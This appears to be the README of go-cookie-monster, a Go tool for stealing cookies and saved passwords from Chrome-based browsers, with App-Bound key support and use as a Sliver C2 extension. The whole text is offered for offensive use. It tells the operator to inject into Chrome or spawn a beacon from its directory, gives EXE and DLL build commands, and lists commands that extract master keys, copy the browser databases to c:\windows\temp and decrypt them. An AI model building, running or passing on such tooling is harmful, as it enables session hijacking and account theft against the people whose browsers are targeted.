Go-based program for stealing chrome-based browser cookies and passwords, with App-Bound Key support. For use as direct execution or via a Sliver extension.
Credits: KingOfTheNOPs/cookie-monster
🚨 The catch is your process must be running out of web browser's application directory. i.e. must inject into Chrome or spawn a beacon from the same directory as Chrome.
# build (EXE)
make exe
# build shared library (DLL)
make dllModes
keys: attempt to obtain master and appbound keysfiles: attempt to copy databases via a chrome process's handles, fallback to diskcookies: decrypt the cookies dblogindata: decrypt the login data db
Usage of go-cookie-monster [all|keys|files|cookies|logindata]:
-dbpath string
path to the database (required in 'cookies' mode)
-key string
decryption key (required in 'cookies' mode)
-outputdir string
output directory for files (used in 'files' mode)
-statefile string
path to the Local State file (used in 'keys' mode)
# all modes
.\go-cookie-monster.exe
# get master and/or app-bound keys
.\go-cookie-monster.exe keys
# get a copy of the databases
.\go-cookie-monster.exe files -outputdir "c:\windows\temp"
# decrypt database copies
.\go-cookie-monster.exe cookies -key "\xHH\xHH\xHH..." -dbpath "c:\windows\temp\cookies.db"